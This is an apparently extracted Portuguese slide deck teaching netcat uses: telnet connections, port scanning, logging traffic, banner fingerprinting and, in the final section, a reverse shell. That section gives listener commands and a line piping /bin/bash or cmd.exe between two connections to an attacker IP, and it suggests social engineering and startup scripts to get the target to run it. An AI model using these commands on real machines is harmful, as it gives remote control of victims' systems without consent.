NETCAT

Luiz Eduardo Guarino de Vasconcelos

O que ?

Canivete suo  cheio de acessrios

NetCat ou apenas nc, o canivete suo do TCP/IP
Pode ser usado para trojan, port scan, brute force,
etc
Nada mal para quem surgiu como um Telnet
melhorado

Para que serve?

Diversas possibilidades
O que impressiona o tamanho do programa
(muito pequeno) pelo seu potencial
Nc permite manipular conexes TCP/IP para
alcanarmos alguns objetivos

Obtendo

Instalado nas distribuies Linux mais conhecidas

Pode obter com apt-get install netcat
Digite nc ou netcat no console. Se aparecer Cmd
line que est instalado
Existe a verso para Windows tambm

Descompactar

os arquivos em qualquer pasta

Funcionamento

Semelhante as outras ferramentas de console (linha

de comando)
Digitar nome do programa, seguido dos
parmetros, do IP e talvez as portas desejadas
Exemplo de varredura port scan de 1 a 100
Duas formas

nc

vv 192.168.0.1 1-100 (comando direto)

nc
E


depois os parmetros no Cmd line

vv 192.168.0.1 1-100

Parmetros

Ajuda

nc h

-l: coloca uma porta em estado de escuta (listen)

-L: coloca porta em escuta mas reabre caso ela feche

-p XX: define uma porta

-v ou vv: ativa o echo (verbose)

-u: usa UDP ao invs de TCP

-t: conexo por Telnet

-w XX: determina tempo mximo em segundos para aguardar
resposta

-e: redireciona arquivos

-d: coloca o nc em modo furtivo, ou seja, oculto e carregado na
memria

Na Prtica

Veremos alguns exemplos

importante que entenda e pratique
Desta forma, poder adaptar os exemplos as suas
necessidades

NetCat como Telnet

O que ?

Telnet

um protocolo/programa que permite a ligao

de um computador a outro

Na prtica, quer dizer acesso remoto a outro
computador, esteja na rede local ou na INternet

Telnet conhecimento imprescindvel, tanto para
invasores como para profissionais de segurana

Como fazer isso com o nc?

Basta

informar o endereo do host e a porta de

conexo. Porta padro do Telnet 23.

nc 192.168.0.1 23

NetCat como PortScan

O que ?

Port

Scan a tcnica de buscar no host quais portas e

servios esto ativos

Como fazer isso com o nc?

nc

-vv 127.0.0.1 1-100

nc -vv 127.0.0.1 23 21 80 110

NetCat como Sniffer

O que ?

Sniffer

a tcnica de captura de pacotes da rede

Imagine voc enviando um e-mail num cybercafe e
algum na outra mquina recebendo a mensagem e a
senha do seu provedor

Como fazer isso com o nc?

nc

-vv -L 127.0.0.1 -p 80 > log.txt

Para ver o resultado, abra o arquivo no bloco de

notas ou usando vi ou type

NetCat como FingerPrint

O que ?

Fingerprint

impresso digital

Uso do nc para saber qual o SO que est rodando
num servidor web

Como fazer isso com o nc?

nc

www.dominio.com.br 80

Depois digite
 get

./
 Receber cabealho do alvo

Net Cat com Conexo Reversa

O que ?

A idia simples. Se no podemos nos conectar no alvo por causa de restries

de firewalls, ento vamos fazer o usurio conectar a ns

Sabemos que firewall mais rigoroso com conexes de entrada. Ento podemos
usar as portas 53 e 79, pois so usadas em consultas DNS e finger.

Como fazer isso com o nc?

Tcnica que depende da colaborao do alvo, seja de forma ativa ou passiva.

Trabalho de engenharia social. Uso de .bat, tarefas, inicializador, etc

Na mquina do invasor, digitar

 nc -l -n -vv -p 53
 nc -l -n -vv -p 79

Na mquina do alvo, ele dever digitar

 Se alvo em Linux
 nc IP_Invasor 53 | /bin/bash | nc IP_invasor 79
 Se alvo em Windows
 nc IP_Invasor 53 | cmd.exe | nc IP_invasor 79

Prtica

Aplique as tcnicas abordadas na sua cobaia